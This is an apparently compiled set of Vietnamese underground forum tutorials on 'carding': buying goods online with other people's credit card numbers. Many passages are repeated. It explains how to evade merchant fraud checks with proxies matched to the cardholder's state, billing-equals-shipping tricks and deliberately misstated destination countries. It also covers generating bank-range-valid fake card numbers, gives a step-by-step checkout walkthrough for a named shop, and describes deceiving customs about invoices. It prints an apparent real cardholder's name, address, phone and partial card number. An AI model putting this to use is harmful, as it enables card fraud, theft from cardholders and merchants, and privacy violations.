+ Ship qua bọn shipper rẻ tiền như USPS là kiểu Airmail hay Surface Post –> về Bưu điện Hanoi , bạn sẽ nhận được giấy báo ra bưu điện nhận hàng.Ở đó bạn sẽ gặp mấy ông Hải quan và có thể sẽ xin được giảm thuế đễn zero.Bạn phải làm sao cho mấy ông đó nghĩ rằng hàng đó ít tiền,mục đích là để mình sử dụng chứ không phải đem bán, mình còn là học sinh , SV –> ít tiền.Tốt nhất là lám sao cho bọn nó không thấy được tờ Invoice.
Ship qua Airmail như vậy sẽ giảm thuế và chắc chắn sẽ về VN nhưng đợi hơi lâu ( ship gián tiếp như vậy mất 3->4 tuần)
+ Ship qua shipper xịn (Courier Shipper) thì sẽ nhanh , mất khoảng 1 tuần nhưng bạn sẽ không xin giảm thuế được.Bạn có quyền trả lại hàng nếu thuế quá cao.Với lại , ship qua Courier Shipper sẽ có tracking number để theo dõi đường đi của hàng hằng ngày nhưng sẽ có rủi ro bị giữ lại hàng vì shop gửi email cho bọn nó đòi giữ lại hàng.
Mở rộng : ship nhầm
nước + nhầm tỉnh : VD Ghi như sau:
Address: 123 Thai Ha – Hanoi
City: Hai Phong
Address: 123 Thai Ha – Hanoi
City: Hai Phong
————————————
Phụ lục : Cách tìm shops
——————————-
Phụ lục : Cách tìm shops
——————————-
i) Ship cho dropper :
US : shopping.com , froogle.com –> điền mã hàng cần mua . VD : hx4705
UK,EU: kelkoo.com , froogle.co.uk
AU: shopbot.com.au
US : shopping.com , froogle.com –> điền mã hàng cần mua . VD : hx4705
UK,EU: kelkoo.com , froogle.co.uk
AU: shopbot.com.au
Froogle và Google:
Keywords: VD: shop hx4705 .com.au
ii)Ship gián tiếp về
Vietnam:
Vì áp dụng phương pháp ship nhầm nước nên bạn chỉ cần tìm shop cho ship international là có thể về được VN.(kể cả shop chỉ ship trong 1 châu lục)
Dùng froogle/google:
Keywords: VD: shop hx4705 “international shipping” .co.uk cart
“worldwide shipping”
USPS Global
….
Vì áp dụng phương pháp ship nhầm nước nên bạn chỉ cần tìm shop cho ship international là có thể về được VN.(kể cả shop chỉ ship trong 1 châu lục)
Dùng froogle/google:
Keywords: VD: shop hx4705 “international shipping” .co.uk cart
“worldwide shipping”
USPS Global
….
————————————————————
Phụ luc 2: Cách xin giảm thuế lúc gặp Hải quan:
————————————————————
Phụ luc 2: Cách xin giảm thuế lúc gặp Hải quan:
————————————————————
Cách này chỉ áp dụng
được đối với hàng ship về VN mà bưu điện HN gửi giấy báo ra nhận hàng ( lúc
ship bạn chọn shipping menthod loại rẻ tiền nhất , thường là dịch vụ Airmail ,
USPS,Royal Mail,Hong Kong post (loại của nhà nước), KHÔNG phải là UPS,FedEx hay
DHL).
Bạn phải gặp Hải quan tại bưu điện.Lúc gặp,bạn có thể nói mình là học sinh –> ít tiền . Bạn nên nêu ra thêm các lý do để biện minh rằng:
+ Hàng không có giá trị cao (bọn HQ gà đối với những lô hàng bé.Tốt nhất là bạn làm thế nào để bọn nó không thấy Invoice hoặc làm thế nào đó để invoice khai khống (tức là khai giá trị thấp hơn).
+ Hàng mua về để mình dùng , không phải để đi đem bán.
—–> Xin được linh động.
Nếu ship ít –> cứ nói là nhận hàng lần đầu –> Không biết là phải đóng thuế nên cũng mang ít tiền.
Bạn phải gặp Hải quan tại bưu điện.Lúc gặp,bạn có thể nói mình là học sinh –> ít tiền . Bạn nên nêu ra thêm các lý do để biện minh rằng:
+ Hàng không có giá trị cao (bọn HQ gà đối với những lô hàng bé.Tốt nhất là bạn làm thế nào để bọn nó không thấy Invoice hoặc làm thế nào đó để invoice khai khống (tức là khai giá trị thấp hơn).
+ Hàng mua về để mình dùng , không phải để đi đem bán.
—–> Xin được linh động.
Nếu ship ít –> cứ nói là nhận hàng lần đầu –> Không biết là phải đóng thuế nên cũng mang ít tiền.
———-
Lời kết :
———-
Lời kết :
———-
Bài viết của tôi chứa 2
kiến thức mới được công bố : phương pháp ship nhầm nước và cách điền Billing
form (nguyên lý 1) . Công cụ mạnh nhất chính là Ship nhầm nước.Hơn nữa, khi
ship bằng phương pháp này , Vietnam sẽ không bị mang tiếng xấu –> khó bị
kiện –> các VNese Leaders sẽ không truy cứu và mình cũng sẽ được an toàn
hơn.
Tại sao tôi ship hàng ?
Bởi các lợi ích sau:
+ Cá nhân : Bạn sẽ cảm
thấy sung sướng vì tự nhiên có đồ xịn , có tiền tiêu , hãnh diện với bạn bè.
+ Đất nước : tăng tổng sản phẩm quốc nội,cũng giống như bạn thu được ngoại tệ vậy –> Làm giàu cho đất nước.
+ Xã hội : các shops sau khi bị chơi xong sẽ tăng cường security
+ Đất nước : tăng tổng sản phẩm quốc nội,cũng giống như bạn thu được ngoại tệ vậy –> Làm giàu cho đất nước.
+ Xã hội : các shops sau khi bị chơi xong sẽ tăng cường security
Tuy vậy, sau 2 năm rưỡi sử dụng
CC và đã gặt hái được chút ít thành công , tôi quyết định từ bỏ việc sử dụng CC
chùa từ tháng 04 này . Bởi dù thế nào,việc xài CC chùa cũng tương tự như việc
bạn vào nhà 1 người rùi lấy cắp 1 chiếc xe máy của họ vậy, therefore that is
not good . Furthermore , việc xài CC nhiều sẽ ảnh hưởng đến nhân cách của mình
sau này(không đàng hoàng).Với lại, do đầu tư vào công việc quá nhiều nên chả
ngủ nghê gì cả công việc cơ quan bỏ bễ nên mang tiếng quá ” Làm việc gì cũng
phải có giới hạn- quá giới hạn đó thì lại như tôi đó “.
Tý quên, còn một số
điểm bà con phải lưu ý đấy, tôi xin trình bày tiếp kẻo lại mang tiếng là không
nói hết công việc hậu trường của quá trình này.
Cách SHIP hàng
Áp dụng phương pháp khai billing address = shipping address :
Như đã nói ở bài học số 1 , các payment gate chỉ check được CC number , CVN (CVV, Authorization Number) , Zipcode . Vì vậy khi điền Billing form, bạn sẽ chỉ điền đúng các thông số trên.Phần Shipping address bạn điền giống hệt Billing address.Bọn shop thấy hàng gửi đến chủ thẻ –> dễ dàng chấp nhận hơn.
Áp dụng phương pháp khai billing address = shipping address :
Như đã nói ở bài học số 1 , các payment gate chỉ check được CC number , CVN (CVV, Authorization Number) , Zipcode . Vì vậy khi điền Billing form, bạn sẽ chỉ điền đúng các thông số trên.Phần Shipping address bạn điền giống hệt Billing address.Bọn shop thấy hàng gửi đến chủ thẻ –> dễ dàng chấp nhận hơn.
+ Áp dụng phương pháp
ship nhầm nước:Vì hầu hết các shop cho ship toàn cầu đều đã cấm Vietnam nên bạn
sẽ không thể ship về nhà mình mà không áp dụng phương pháp này.Bạn sẽ điền
Shipping và Billing Country là 1 nước nào đó như Singapore, Hong Kong, France ,
….. (nên để country trùng với country của chủ thẻ )
Cơ chế: khai thác lỗ
hổng : Bọn shipper ( vận chuyển) như USPS,UPS,DHL,FedEx sẽ ship đến nước ghi
nhầm đó. Sau khi hàng đến , bọn nó không tìm thấy thành phố Hanoi –> sẽ
search lại và tìm thấy nó ở VN –> chuyển lại về VN miễn phí cho mình.
Nếu bọn nó đã send lại
email cho mình ( không phải confirmation email) là order shipped thì gần như
chắc chắn bạn sẽ nhận được hàng.
Lưu ý:
+ Ship qua bọn shipper rẻ tiền như USPS là kiểu Airmail hay Surface Post –> về Bưu điện Hanoi , bạn sẽ nhận được giấy báo ra bưu điện nhận hàng.Ở đó bạn sẽ gặp mấy ông Hải quan và có thể sẽ xin được giảm thuế đễn zero.Bạn phải làm sao cho mấy ông đó nghĩ rằng hàng đó ít tiền,mục đích là để mình sử dụng chứ không phải đem bán, mình còn là học sinh , SV –> ít tiền.Tốt nhất là lám sao cho bọn nó không thấy được tờ Invoice.
Ship qua Airmail như vậy sẽ giảm thuế và chắc chắn sẽ về VN nhưng đợi hơi lâu ( ship gián tiếp như vậy mất 3->4 tuần)
+ Ship qua shipper xịn (Courier Shipper) thì sẽ nhanh , mất khoảng 1 tuần nhưng bạn sẽ không xin giảm thuế được.Bạn có quyền trả lại hàng nếu thuế quá cao.Với lại , ship qua Courier Shipper sẽ có tracking number để theo dõi đường đi của hàng hằng ngày nhưng sẽ có rủi ro bị giữ lại hàng vì shop gửi email cho bọn nó đòi giữ lại hàng.
+ Ship qua bọn shipper rẻ tiền như USPS là kiểu Airmail hay Surface Post –> về Bưu điện Hanoi , bạn sẽ nhận được giấy báo ra bưu điện nhận hàng.Ở đó bạn sẽ gặp mấy ông Hải quan và có thể sẽ xin được giảm thuế đễn zero.Bạn phải làm sao cho mấy ông đó nghĩ rằng hàng đó ít tiền,mục đích là để mình sử dụng chứ không phải đem bán, mình còn là học sinh , SV –> ít tiền.Tốt nhất là lám sao cho bọn nó không thấy được tờ Invoice.
Ship qua Airmail như vậy sẽ giảm thuế và chắc chắn sẽ về VN nhưng đợi hơi lâu ( ship gián tiếp như vậy mất 3->4 tuần)
+ Ship qua shipper xịn (Courier Shipper) thì sẽ nhanh , mất khoảng 1 tuần nhưng bạn sẽ không xin giảm thuế được.Bạn có quyền trả lại hàng nếu thuế quá cao.Với lại , ship qua Courier Shipper sẽ có tracking number để theo dõi đường đi của hàng hằng ngày nhưng sẽ có rủi ro bị giữ lại hàng vì shop gửi email cho bọn nó đòi giữ lại hàng.
Kinh nghiệm ship hàng
Phần 1 là thuật ngữ và 1 số kiến thức cơ bản, tuy dài dòng nhưng sẽ rất có ích nếu bạn hiểu nó. Phần 2 sẽ về các tips nhỏ để vượt qua gateway và shop.
1. Thuật ngữ:
.:. Drop : người nhận hàng cho bạn, có thể ở chung country hoặc ở country khác. Tại sao cần drop ? 1 số shop k0 ship đến country của bạn nên cần drop. Drop còn được dùng để làm fone vf cho bạn hoặc làm cho shipping name có vẻ hợp lệ hơn là 1 azn name ( asian ).
.:. Carding: dùng card của người khác để mua 1 thứ gì đó, online hoặc hàng thực sự.
.:. Cash out: lấy tiền mặt ra trực tiếp từ bank hoặc atm.
.:. Dump: data được viết lên lên ATM card. Data này theo format đã được encrypt theo algo của bank
.:. COB ( change of billing ): khi có 1 cc full info như mother name, SSN ( social security number, DOB ( date of birth ) vv, có thể call bank để kêu bank thay địa chỉ billing bằng địa chỉ của mình, lưu ý việc này là hoàn toàn hợp lệ.
.:. Bin: số xác định bank, là 6 số đầu tiên của cc.
Phần 1 là thuật ngữ và 1 số kiến thức cơ bản, tuy dài dòng nhưng sẽ rất có ích nếu bạn hiểu nó. Phần 2 sẽ về các tips nhỏ để vượt qua gateway và shop.
1. Thuật ngữ:
.:. Drop : người nhận hàng cho bạn, có thể ở chung country hoặc ở country khác. Tại sao cần drop ? 1 số shop k0 ship đến country của bạn nên cần drop. Drop còn được dùng để làm fone vf cho bạn hoặc làm cho shipping name có vẻ hợp lệ hơn là 1 azn name ( asian ).
.:. Carding: dùng card của người khác để mua 1 thứ gì đó, online hoặc hàng thực sự.
.:. Cash out: lấy tiền mặt ra trực tiếp từ bank hoặc atm.
.:. Dump: data được viết lên lên ATM card. Data này theo format đã được encrypt theo algo của bank
.:. COB ( change of billing ): khi có 1 cc full info như mother name, SSN ( social security number, DOB ( date of birth ) vv, có thể call bank để kêu bank thay địa chỉ billing bằng địa chỉ của mình, lưu ý việc này là hoàn toàn hợp lệ.
.:. Bin: số xác định bank, là 6 số đầu tiên của cc.
2. Ship hàng
Cần lưu ý tới 1 số điểm sau:
Tuyệt đối đừng nên ship hàng bằng free mail. 1 số shop khi gặp free email sẽ cẩn thận và bắt buộc qua 1 số thủ tục. Và chuyện lấy 1 mail account như AOL account k0 khó. AOL cho phép 59 ngày trial, bạn chỉ cần có 1 cc hợp lệ và sẽ setup được 1 AOL account. Lưu ý AOL có 1 loại browser gọi là AOL browser, khi dùng cái này bạn sẽ connect vào AOL network và có 1 ip của AOL. ip này k0 bao giờ bị blacklist hoặc bị ban, vì nếu nó ban thì nó đã ban cả chục triệu người sử dụng AOL khác. 1 điểm khác khi lập AOL account là nên lấy account name trùng tên với cc, thí dụ như là jones.pro.shipper@aol có vẻ thật hơn là daicavn@aol.com
Cần lưu ý tới 1 số điểm sau:
Tuyệt đối đừng nên ship hàng bằng free mail. 1 số shop khi gặp free email sẽ cẩn thận và bắt buộc qua 1 số thủ tục. Và chuyện lấy 1 mail account như AOL account k0 khó. AOL cho phép 59 ngày trial, bạn chỉ cần có 1 cc hợp lệ và sẽ setup được 1 AOL account. Lưu ý AOL có 1 loại browser gọi là AOL browser, khi dùng cái này bạn sẽ connect vào AOL network và có 1 ip của AOL. ip này k0 bao giờ bị blacklist hoặc bị ban, vì nếu nó ban thì nó đã ban cả chục triệu người sử dụng AOL khác. 1 điểm khác khi lập AOL account là nên lấy account name trùng tên với cc, thí dụ như là jones.pro.shipper@aol có vẻ thật hơn là daicavn@aol.com
Hiểu payment gateway: paygate và bank gateway interface với
nhau theo 2 bước: Pre-Authorization và AUthorization. Trong db của paygate có
list các bank và interface, khi paygate nhận cc sẽ check 6 số đầu để biết bank
nào và construct 1 string bao gồm cc+name+exp+address nếu có AVS ( address
verification system) hoặc cc+name+exp nếu k0 có AVS và code Pre-Auth hoặc Auth.
Thứ tự giữa cc name date tùy thuộc vào bank gateway. Sau khi nó construct
string đó sẽ send tới bank, ở bước Pre-Authorization bank chỉ check xem cc đó
có thuộc range của mình k0, và check cc đó và exp có match với nhau, cuối cùng
là check limit ban đầu của cc có đủ mua món hàng đó k0. Tùy mỗi trường hợp bank
sẽ tạo ra 1 response code gửi về cho gateway, như là insufficient fund, date
not valid ( 2co báo lỗi date not valid là Do Not Honor ). Lưu ý ở bước
Pre-Authorization này thực sự bank KHÔNG check database của mình, và cũng chưa
charge cc. 1 số paygate có thể config real-time processing hoặc manual process,
realtime thì paygate sẽ thực hiện Authorization luôn, có nghĩa là buộc bank
phải query db của mình và fund tiền cho acc của paygate, từ đó paygate sẽ fund
tiền cho merchant. Còn manual processing là paygate thực hiện Pre-Auth để coi
tính hợp lệ của payment và sau đó sẽ gom cc đi charge 1 lượt ở bước Auth.
Biết được những thứ này để làm gì ? Trong mấy ngày qua, sss mò ra được bank range của 1 số bank bên AU nơi sss ở, và tự tạo ra cc valid, cc này được lợi ở chỗ nào: đây là cc valid sẽ qua được bước Pre-Auth vì bank sẽ check đúng range của mình, đúng exp và valid, thực sự cc k0 có thật trong bank. Cái này dùng để mua soft instant activation, mua hàng của whole seller hoặc mua mobile dạng plan ( dạng trả trước, verify cc valid nó sẽ send mobile cho mình rồi cuối mỗi tháng charge cc 1 lần). Cách làm những chuyện này sss sẽ post sau.
Biết được những thứ này để làm gì ? Trong mấy ngày qua, sss mò ra được bank range của 1 số bank bên AU nơi sss ở, và tự tạo ra cc valid, cc này được lợi ở chỗ nào: đây là cc valid sẽ qua được bước Pre-Auth vì bank sẽ check đúng range của mình, đúng exp và valid, thực sự cc k0 có thật trong bank. Cái này dùng để mua soft instant activation, mua hàng của whole seller hoặc mua mobile dạng plan ( dạng trả trước, verify cc valid nó sẽ send mobile cho mình rồi cuối mỗi tháng charge cc 1 lần). Cách làm những chuyện này sss sẽ post sau.
AVS là gì ? AVS là hệ thống check địa chỉ bill đối với những gateway
bên us. Với những paygate bên us khi nhận 1 cc thuộc bank của us khi construct
cái string để send cho bank gateway nó sẽ thêm vào đó địa chỉ của cc, bank sẽ
thực hiện AVS và gửi response là address mismatch nếu địa chỉ sai. Nhưng cùng 1
gateway đó, nếu gặp cc k0 thuộc us như cc các nước châu á, cc finland thì nó k0
check được AVS do k0 có connection với bank và k0 có xác định được format của
address. Chỉ những paygate lớn như paypal mới có thể check avs đối với bank
international, và ngay cả paypal cũng k0 check được avs, cvv2 của các cc thuộc
hk, bangladesh.
Điều này có lợi như thế nào: bạn mua hàng ở website us dùng cc 1 số nước khác như cc bangladesh, có thể bỏ địa chỉ bill = địa chỉ ship và làm cho transaction trở thành valid. Ngược lại mua site uk chẳng hạn bỏ cc k0 thuộc uk như cc us vào và bỏ địa chỉ mình vào vẫn có thể qua. Có rất nhiều site như vậy, sss chỉ thí dụ vài site: eddiebauer.com (hỏi mdblq xem ship thế nào) và lik-sang.com.
Điều này có lợi như thế nào: bạn mua hàng ở website us dùng cc 1 số nước khác như cc bangladesh, có thể bỏ địa chỉ bill = địa chỉ ship và làm cho transaction trở thành valid. Ngược lại mua site uk chẳng hạn bỏ cc k0 thuộc uk như cc us vào và bỏ địa chỉ mình vào vẫn có thể qua. Có rất nhiều site như vậy, sss chỉ thí dụ vài site: eddiebauer.com (hỏi mdblq xem ship thế nào) và lik-sang.com.
Tránh ship vào thứ 6: tuy những
shop lớn như dell.com, apple.com thứ 7 k0 làm việc, nhưng tốt nhất bạn tránh
những shop nhỏ hơn. shop owner có thể có login vào cuối tuần và review lại
những order, nó càng có nhiều thời gian rảnh thì càng có khả năng phát hiện ra
transaction là fraud.
IP: 1 public proxy từ đó xuất phát nhiều fraud order sẽ được
liệt vào blacklist, và các order sử dụng proxy đó chắc chắn sẽ bị cancel hoặc
bị red flag để qua confirmation. amazone và những site khác liên tục cập nhật
blacklist. ngoài ra amazon còn maintain 1 list các address đen dính líu tới
ship hàng. VD địa chỉ nhà của sss là 1 địa chỉ đen, cứ hễ ship sách amazon về
số nhà sss là automatically cancelled sau 15 phút . Tuy nhiên amazon.com k0
dùng chung db với amazon.co.uk tuy 2 site giống nhau như 1. Do đó bạn bị
blacklist amazon k0 có nghĩa là bạn bị blacklist ở .co.uk
Bài 5:
Cách dùng CC để ship hàng
đối với Tut
này chỉ để các bạn dễ hình dung một vài điều cho các new member nhé:
Mình trình độ có nhưng ráng làm tuts này để hướng dẫn cho newbie cách ship đơn giản bằng ccn non info
các pro nào đã biết thì đừng chém em, em chỉ làm tuts cho newbie hiểu
nếu thiếu sót mong bổ sung,đừng chém
ai leech ghi rõ nguồn dùm mình
mình sẽ vừa hướng dẫn vừa giải thích các thuật ngữ cho các bạn hiểu
Phần 1:
Site thực hành: http://vistaprint.com// ( bán hàng áo thun mũ tự design,bút, thiệp)
Nguyện liệu CCN non Info ( chỉ có số cc và hạn dùng )
Sock: IP VN
B=S hoặc B # S đều được
ở đây mình giải thích chút
b=s tức là Bill address = Shipping Address ( Đia chỉ thanh toán và địa chỉ gửi hàng giống nhau )
* có thể điền toàn bộ là info và địa chỉ của bạn
b#s tức là Bill address # Shipping Address ( Đia chỉ thanh toán và địa chỉ gửi hàng khác nhau )
*Billing address : điển địa chỉ của cc
*Shipping address: điền địa chỉ của bạn
Ok bắt đầu
đầu tiên các bạn vào site http://vistaprint.com/
bằng Sock: IP VN
sau này nâng cao các bạn sẽ fake sock ( tính sau )
Bước 1: chọn 1 món hàng và bấ́m order now
Bước 2: sau đó các bạn đăng ký thông tin
Bước 3: chọn Next
Bước 4: chọn Check out
Bước 5: điền thông tin Shipping address ( địa chỉ chuyển hàng)
Tức là địa chỉ nhà bạn
Phần 2:
Điền Billing Address ( Địa chỉ thanh toán )
Địa chỉ info của cc
Nhưng tuts này B=S được nên các bạn cũng có thể điền Info của mình
Sau đó chọn next
Đến bước Check Out
Các bạn chỉ việc điền Number của CC mà hạn dủng\
chọn loại card
và bấm next
ở đây loại card các bạn để ý số đầu của CC
3 : là Amex
4 : là visa
5 : Master
Bước cuối cùng các bạn chọn acept và chờ nó xác nhận là các bạn đá thành công
đối với site này chỉ cần ra như hình dưới là các bạn chỉ việc còn lại là chờ hàng về
thời gian hàng về tới VN là 21 ngày, hơi lâu nhưng là site dễ để các bạn tập ship
chúc các bạn thành công
một số bạn kêu site nát, và mình đã thử cho 1 bạn và kết quả là shipped nên mình xin đính chính là site vẫn ăn được nhưng do các bạn ko biết cách nên hàng ko về
nay minh hướng dẫn luôn các bạn bước cuối cùng
khi order ped các bạn sẽ nhận được 1 mail có có dạng
bạn bấm vào và đang nhập sẽ nhìn thấy thông báo ngày hàng về đến nhà
VD:
Order Status: Processing
Delivery Option: 21 Days
Arrives on or before: 01/01/2012 ( đây là ngay hàng về ngay 01-01-2012 ) - ngày-tháng-năm
đến ngày 01 các bạn chưa nhận được hàng
hãy gữi 1 email đến địa chỉ:
yêu cầu họ gửi hàng
VD gửi mail với nội dung
sau đó chờ mail phản hồi về shipped
Khi có mail về bạn vào check lại trong site sẽ như bên dưới
http://upanh.ws/?di=STU9
và chờ từ 8-14 ngày hàng sẽ về
hết.
Hàng về khá lâu tính ra phải 28-35 ngày hàng mới về
nguồn leech
Ship là một hành động vận chuyển hàng hóa, Shipper là người khởi động việc này hoặc làm việc này bắt đầu.
Người bình thường cũng có thể gọi là Shipper khi họ vào một Shop Online (Cửa hàng trên mạng) và đặt mua một món đồ gì đó. Nhưng Shipper trong Thế giới ngầm (UG) này là một người mua hàng cho mình nhưng thanh toán bằng tiền của người khác. Đó chính là sử dụng CC tức Credit Card (Thẻ tín dụng) của người khác để mua hàng. CC cũng chính là nồi cơm của tất cả các dân UG, thiếu nó thì Thế giới UG sẽ không tồn tại.
Và để bước chân vào việc ship hàng thì các bạn phải hiểu 1 số thuật ngữ trong việc ship hàng do các shiper đặt ra . mình không đề cập đến việc đọc CC nữa nhé ... Vi khi muốn ship thì ai cũng phải biết cái này
I . Thuật Ngữ Shipper
Drop : Thuật ngữ này được nhắc tới khá nhiều trong các tut ship , hay mọi người vẫn thường nói với nhau . Drop là gì ??? Thưa các bạn drop chính là 1 người có trách nhiệm nhận hàng cho chúng ta ở các nước US , Canada , Inter ... Có thể ở đây là 1 người bạn thân nào đó , hoặc là 1 anh bạn tây nào đó .
Bin : bin là 5 con số đầu tiên của 1 CCnumber . thường thì các bin này sẽ cho ta biết Creatcard này thuộc bank gì !
Ví dụ : Tôi có 1 số CCnumber của 1 con CC như sau :
Quote:
4828572353233026
Tôi lấy 5 số đầu tiên là :
Quote:
48285
Mình trình độ có nhưng ráng làm tuts này để hướng dẫn cho newbie cách ship đơn giản bằng ccn non info
các pro nào đã biết thì đừng chém em, em chỉ làm tuts cho newbie hiểu
nếu thiếu sót mong bổ sung,đừng chém
ai leech ghi rõ nguồn dùm mình
mình sẽ vừa hướng dẫn vừa giải thích các thuật ngữ cho các bạn hiểu
Phần 1:
Site thực hành: http://vistaprint.com// ( bán hàng áo thun mũ tự design,bút, thiệp)
Nguyện liệu CCN non Info ( chỉ có số cc và hạn dùng )
Sock: IP VN
B=S hoặc B # S đều được
ở đây mình giải thích chút
b=s tức là Bill address = Shipping Address ( Đia chỉ thanh toán và địa chỉ gửi hàng giống nhau )
* có thể điền toàn bộ là info và địa chỉ của bạn
b#s tức là Bill address # Shipping Address ( Đia chỉ thanh toán và địa chỉ gửi hàng khác nhau )
*Billing address : điển địa chỉ của cc
*Shipping address: điền địa chỉ của bạn
Ok bắt đầu
đầu tiên các bạn vào site http://vistaprint.com/
bằng Sock: IP VN
sau này nâng cao các bạn sẽ fake sock ( tính sau )
Bước 1: chọn 1 món hàng và bấ́m order now
Bước 2: sau đó các bạn đăng ký thông tin
Bước 3: chọn Next
Bước 4: chọn Check out
Bước 5: điền thông tin Shipping address ( địa chỉ chuyển hàng)
Tức là địa chỉ nhà bạn
Phần 2:
Điền Billing Address ( Địa chỉ thanh toán )
Địa chỉ info của cc
Nhưng tuts này B=S được nên các bạn cũng có thể điền Info của mình
Sau đó chọn next
Đến bước Check Out
Các bạn chỉ việc điền Number của CC mà hạn dủng\
chọn loại card
và bấm next
ở đây loại card các bạn để ý số đầu của CC
3 : là Amex
4 : là visa
5 : Master
Bước cuối cùng các bạn chọn acept và chờ nó xác nhận là các bạn đá thành công
đối với site này chỉ cần ra như hình dưới là các bạn chỉ việc còn lại là chờ hàng về
thời gian hàng về tới VN là 21 ngày, hơi lâu nhưng là site dễ để các bạn tập ship
chúc các bạn thành công
một số bạn kêu site nát, và mình đã thử cho 1 bạn và kết quả là shipped nên mình xin đính chính là site vẫn ăn được nhưng do các bạn ko biết cách nên hàng ko về
nay minh hướng dẫn luôn các bạn bước cuối cùng
khi order ped các bạn sẽ nhận được 1 mail có có dạng
bạn bấm vào và đang nhập sẽ nhìn thấy thông báo ngày hàng về đến nhà
VD:
Order Status: Processing
Delivery Option: 21 Days
Arrives on or before: 01/01/2012 ( đây là ngay hàng về ngay 01-01-2012 ) - ngày-tháng-năm
đến ngày 01 các bạn chưa nhận được hàng
hãy gữi 1 email đến địa chỉ:
yêu cầu họ gửi hàng
VD gửi mail với nội dung
sau đó chờ mail phản hồi về shipped
Khi có mail về bạn vào check lại trong site sẽ như bên dưới
http://upanh.ws/?di=STU9
và chờ từ 8-14 ngày hàng sẽ về
hết.
Hàng về khá lâu tính ra phải 28-35 ngày hàng mới về
nguồn leech
Ship là một hành động vận chuyển hàng hóa, Shipper là người khởi động việc này hoặc làm việc này bắt đầu.
Người bình thường cũng có thể gọi là Shipper khi họ vào một Shop Online (Cửa hàng trên mạng) và đặt mua một món đồ gì đó. Nhưng Shipper trong Thế giới ngầm (UG) này là một người mua hàng cho mình nhưng thanh toán bằng tiền của người khác. Đó chính là sử dụng CC tức Credit Card (Thẻ tín dụng) của người khác để mua hàng. CC cũng chính là nồi cơm của tất cả các dân UG, thiếu nó thì Thế giới UG sẽ không tồn tại.
Và để bước chân vào việc ship hàng thì các bạn phải hiểu 1 số thuật ngữ trong việc ship hàng do các shiper đặt ra . mình không đề cập đến việc đọc CC nữa nhé ... Vi khi muốn ship thì ai cũng phải biết cái này
I . Thuật Ngữ Shipper
Drop : Thuật ngữ này được nhắc tới khá nhiều trong các tut ship , hay mọi người vẫn thường nói với nhau . Drop là gì ??? Thưa các bạn drop chính là 1 người có trách nhiệm nhận hàng cho chúng ta ở các nước US , Canada , Inter ... Có thể ở đây là 1 người bạn thân nào đó , hoặc là 1 anh bạn tây nào đó .
Bin : bin là 5 con số đầu tiên của 1 CCnumber . thường thì các bin này sẽ cho ta biết Creatcard này thuộc bank gì !
Ví dụ : Tôi có 1 số CCnumber của 1 con CC như sau :
Quote:
4828572353233026
Tôi lấy 5 số đầu tiên là :
Quote:
48285
. Sau đó tôi
check cái bin này thì sẽ ra bank .
Quote:
WACHOVIA BANK, N.A. DEBIT CLASSIC
Bin = Ship ( Billing Information = Shipping Information ) : ở đây có nghĩa là dùng chính địa chỉ người nhận hàng làm địa chỉ thanh toán .
Ví Dụ : Tôi có 1 con CC như sau :
Quote:
Heather | burnette | 385 e.beal st. | Highland Springs | Virginia | 23075 | 8043221052 | US | 51515800402xxxxx | 01 | 2011 | 573
ở đây địa chỉ thanh toán đúng phải là :
Quote:
| 385 e.beal st. | Highland Springs | Virginia | 23075 |
Nhưng chúng ta sẽ fake địa chỉ này bằng chính địa chỉ người nhận . trong khi đó vẫn giữ nguyên tên và ccnumber vẫn là của con CC
Phương pháp này thì tùy 1 số Shop mới làm được chứ không phải 100% shop nào cũng làm được đâu nhé
Bin # Ship ( Billing Information # Shipping Information ) : Quá đơn giản và dễ hiểu rồi ... cái này thì mình ship như bình thường thôi . Điền illing Information ( của cc ) và Shipping Information ( của drop ) .
Sock = state : Khi đi ship hàng thì việc đầu tiên của chung ta là fake sock đúng không ? Sock = state có nghĩa là bạn phải fake IP thành state của con CC
Ví Dụ : ở con CC
Quote:
Heather | burnette | 385 e.beal st. | Highland Springs | Virginia | 23075 | 8043221052 | US | 51515800402xxxxx | 01 | 2011 | 573
Thì State của nó là :
Quote:
Virginia
Thì Các bạn phải fake sock state Virginia thôi
Sock US : đơn giản quá rồi miễn là sock us thôi . chẳng có gì rằng buộc cả
II . Kinh Nghiệm Ship Hàng
- Việc ship hàng có thành công hay không thành công dựa vào rất nhiều yếu tố gây nên . nhưng tôi xin đưa ra 1 số kinh nghiệm để giảm thiểu việc ship không thành công .
thứ 1 : Bạn phải đảm bảo rằng CC của bạn live và đủ tiền với món đồ bạn định ship . nếu bạn nào có thể check blance trưóc thì càng tốt . 1 số bạn thì dựa vào địa chỉ nhà ở của con cc mà đoán trước ... cũng có phần phải thôi . Nôm na ra thì nhà ở Phố lớn , phố to phải có nhiều tiền hơn mấy đứa nhà ở ổ chuột rồi
Thứ 2 : Bank chia CC ra rất nhiều loại . như debit card , bussines ... tùy vào từng loại mà các bạn sử dụng . 1 con CC thuộc loại thẻ ghi nợ thì cũng có thể ship món đồ 1000$ , 2000$ nhưng cũng phải xem bank nó có giới hạn ở mức độ nào ( để biết thì các bạn phải test đi test lại nhiều lần và tùy với shop mà sử dụng loại gì ) . Hay các bạn sử dụng 1 con cc thuộc dạng trả trước ... trong CC có 100$ mà các bạn đòi ship tới 300$ , 500$ thì thành công sao được . Đó cũng là nguyên nhân tôi đã nói ở kinh nghiệm thứ 1 . Hay bank có chịu changer tiền ngay hay không hay là nó hold vài ngày rồi mới changer ... ( những cái này thì đều do bạn test hoặc học hỏi kinh nghiệm ở các bro đi trước mà thôi )
Thứ 3 : Sock của bạn . Tùy vào từng shop mà chúng ta phải rút ra kinh nghiệm rằng shop này có thể dùng sock us được hay không ? Hay phải sử dụng Sock = state CC ! để có thể biết được điều này thì đối với shop mới các bạn phải test , hoặc ở 1 số tut khi mọi người đã post thì các bạn nên làm theo cách của chủ tut post k0 nên biến tấu nếu k0 hiểu rõ . Và ở 1 số shop thì nó còn kiểm tra xem sock có Bị blacklist hay không
Thứ 4 : Mình muốn nhắc tới tâm lý ship hàng , 1 số shop nó tính Trung bình thời gian 1 người có thể ship thành công 1 món đồ ( time out ) . Để tránh 1 số trường hợp các bác shiper nhà ta cầm cc , sock vào đâm đầu check out ... Chúng ta hãy mang 1 tâm lý là người chủ thẻ đi mua đồ chứ đừng có hầm hầm vào hãm hiếp ... ít nhất khi vào 1 shop cũng phải vào xem món này món nọ chứ có mấy ai vừa vào chả xem cái gì tự nhiên mua luôn đâu ? ( 1 số bro vẫn làm vậy nhưng không biết là có thủ thuật gì hay là do paygate của shop nó không kĩ tính và mình nói ở khía cạnh mua online nhé không lại có bro nào vặn vẹo bảo mua ngoài đời vẫn thế )
LenoPark-DF
